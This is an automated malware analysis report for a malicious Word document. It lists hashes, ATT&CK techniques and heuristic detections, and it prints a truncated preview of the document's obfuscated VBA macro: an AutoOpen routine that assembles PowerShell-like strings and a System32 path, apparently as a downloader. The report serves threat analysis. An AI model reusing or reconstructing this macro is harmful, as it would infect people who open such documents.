Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9adcef7e216aabf3…

MALICIOUS

Office (OLE)

305.5 KB Created: 2018-10-14 10:25:00 Authoring application: Microsoft Office Word First seen: 2019-03-18
MD5: 5e45ecbaad1723615e1d0447600990f7 SHA-1: db38b9d4d6dad7573410d421e4f378979c58dbce SHA-256: 9adcef7e216aabf33ab85e3991b1d7f4918f8668e5a78011cc4a57ca781dbb50
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an Office document containing a VBA macro with an AutoOpen subroutine. The macro utilizes a CreateObject call, a common technique for executing malicious code or downloading additional payloads. The obfuscated nature of the script prevents a more detailed analysis of its specific actions, but the presence of AutoOpen and CreateObject strongly suggests a downloader or dropper functionality.

Heuristics 7

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 187257 bytes
SHA-256: 79a44341aa5e3d7c0acf511695ba9f32d67d60e44e7205bfabd9573c5ceb2ce9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function ufvrkvv(ovii)
ntuhzhydqhfz = -41 * 31
End Function
Function clwiu79()
nzeugie = -40 / 10
uiyarnu = -72 * 156
nxsao = -152 / 121
End Function
Function eyuypm(gpgwtixs)
pzulwuxxvj = -107 * 17
azaamteue = -174 / 2
eoide = -149 * 93
qdeiei = -37 * 86
End Function
Function cpxbm(flsfdoa30, vsdu03)
untyyddey = -37 + 155
End Function
Function agyeo(ndhy, yoyfk, vxayo)
eaiec = -71 - 122
zwyzkwcthbhw = -22 - 158
End Function
Function fraqflvn()
uuuvxua1 = -13 / 136
End Function
Function yvikpcha0()
pyegbqu = -81 + 63
End Function
Function wzyxfdao(xmaauy, eoddopu)
ozontijpl = -92 / 92
ukaoiyo = -72 - 180
End Function
Function ykwra6(aikcjshxg, avfak8, ksltrsb08)
gueufcu = -26 / 100
End Function
Function odbol()
oureekw39 = -55 / 87
End Function
Function vvqorlk(oulkl, tqixca)
ejbsya = -131 + 175
tjifgk2 = -130 / 34
uikpgesfyy = -42 - 161
End Function
Function zfogzsnq(gljdugxt, nflau, ekged9)
oeywmnyu = -106 * 129
xkakzig = -118 + 128
End Function
Sub AutoOpen()
teyusr = -92 / 179
aigaao = -120 / 145
jlvxpoe = "$nhaagkq"
uauui04 = -7 - 46
mauimx = -34 - 121
ohtbca = "te"
xqsevva1 = "mp"
xiouyyvb = -91 - 141
iwzlfww = -174 * 146
akuu = -101 - 98
iuzwmhmg = ohtbca & xqsevva1
upfeivkye = -71 - 143
pvfjwk = "ohchqpef"
kiirbvsbqsv = -43 * 79
loya = -82 * 164
pyiacce = "gheaicx+$iqaowaoen"
xqeoeo = -56 - 7
qcaye = -169 + 166
howlvkln0 = "zywqiabtlhlpi+"
ekpoo = -171 * 38
Dim rhfjreuhd As String
rhfjreuhd = -152 + 128
kflehpcepgc = -111 * 112
feuye = "$gevaiiaog"
nbaiy1 = -127 * 172
mscxsy = -117 * 15
wuqwyb = -43 / 176
xpjrcgg32 = "guuienz+$sfu"
cukrawvv = -80 - 109
xzaou = "stisbugxy"
fxfnmreo10 = Environ("SystemRoot")
ygneouodho00 = -178 / 157
nbbgkhlzx = -173 - 147
yoauey = -55 / 92
eoenvxu44 = -59 - 92
dlatlrefvapl = -124 / 38
ebzuxkl = "xboahzyrhim"
iaudvbldpt51 = -18 - 160
cfpfamx = "ya+$audg"
eiackncjvd = -50 / 148
eeaodmeb = -80 * 144
qqabshq = jlvxpoe & pvfjwk & pyiacce & howlvkln0 & feuye & xpjrcgg32 & xzaou & ebzuxkl & cfpfamx
auipw8 = -96 * 52
zjzcvxgru = -171 * 177
whufbqvpv = -100 / 113
mqwli47 = -87 * 68
tdbvooe = -14 + 38
Dim giogqv, uyddyazkqo, hwyagxx, kkiso1 As Integer
giogqv = -146 - 50
qkndjdil = -62 / 62
azzketi = "t';$eqkdsgfwuau"
ukdahpsd1 = -90 / 39
yyilbfshzj = -76 - 99
ocnpsddtee = -64 + 156
eemtjo = fxfnmreo10
auyya = -132 + 31
kuoa = -124 * 2
eemtjo = eemtjo + "\sys"
bscroxuvvb = -9 - 138
iaykhya = -17 / 33
Dim kaobwv As Integer
kaobwv = -151 - 100
neee = "subwhfw=' ''\gv"
uiosjri = -165 * 75
fdutjctl = -47 + 178
gjtakb = "fs';$omiyoaqrtauqjwhmooitlu='v"
puoaka = -153 / 155
ukvyeyy = -14 + 171
aijnoaopgcb = -142 - 172
dlxhaio = ":tem';$ggpsidleyetsojuyizjzku="
rzqiu = -178 + 139
ooyrwpbo = -106 + 34
oapz = -147 * 151
gmiitcta = eemtjo
mwjiu8 = -170 + 1
ruufqk = -108 * 118
wlzlxcg = "tem32\"
omdtzqumxey = -148 / 58
yykplckcgvj = -120 * 46
gmiitcta = gmiitcta + wlzlxcg
kwybmiktc = -18 + 77
ongoxayc = -129 - 92
dqoyoo00 = -168 * 23
fmsyhmse = -83 + 14
eibrbxkvp = -83 - 155
ulzfmofj = "'book"
juadyoli09 = -138 / 113
gksci = "skee';$iqaowaoe"
jndnzoau = -117 + 35
Dim aaoyae As Integer
aaoyae = -38 + 111
aoeetd = "nzywqiabtlhl"
uphnze31 = -117 / 105
uevunx12 = azzketi & neee & gjtakb & dlxhaio & ulzfmofj & gksci & aoeetd
Dim hajvvq64 As Integer
hajvvq64 = -16 / 172
amfoevtvgtq = -91 + 163
xhenjslqmdva70 = -39 / 91
crjof = "Windo"
hhpyy = -22 - 143
rplkhrxfhap = -32 + 29
iyyoueaj = -154 - 86
gmiitcta = gmiitcta + crjof
oyliipnrx = -104 * 16
uuxraueapr = -138 + 105
mlgiagzngtp = -98 - 8
oylo = -57 * 134
uuwbbvoko = -7 + 3
ubkuyp = -127 / 81
stmcyae37 = -163 * 36
ugyrn = "hqlitooo"
Dim jbuutu As String
jbuutu = -174 + 97
eomkqoa = -7 + 1
... (truncated)